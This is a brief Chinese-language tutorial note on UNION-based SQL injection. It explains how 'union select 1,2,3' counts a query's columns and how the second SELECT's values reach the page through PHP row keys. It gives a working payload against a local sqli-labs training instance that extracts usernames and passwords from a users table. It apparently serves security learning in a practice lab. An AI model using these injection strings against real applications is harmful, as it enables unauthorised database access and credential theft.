union注入之select

　　在sql注入中我们通常会使用这样一条语句来爆破字段:

id=-1 union select 1,2,3 --+    源代码： SELECT * FROM users WHERE id=-1 union select 1,2,3

　　假如表的字段是三个，他会根据程序的设定来输出哪个字段。如果这时使用键值对来查询，而不是数组标号，就会提出一个问题：根据键值对查询出的结果还会是后面的那个表的结果吗，结果当然是肯定的。

当前面的id=-1 ，即前一个select失效后，查询的键值对会依次输入后面查询的值

echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'union select 1, password,username from users where id =2--+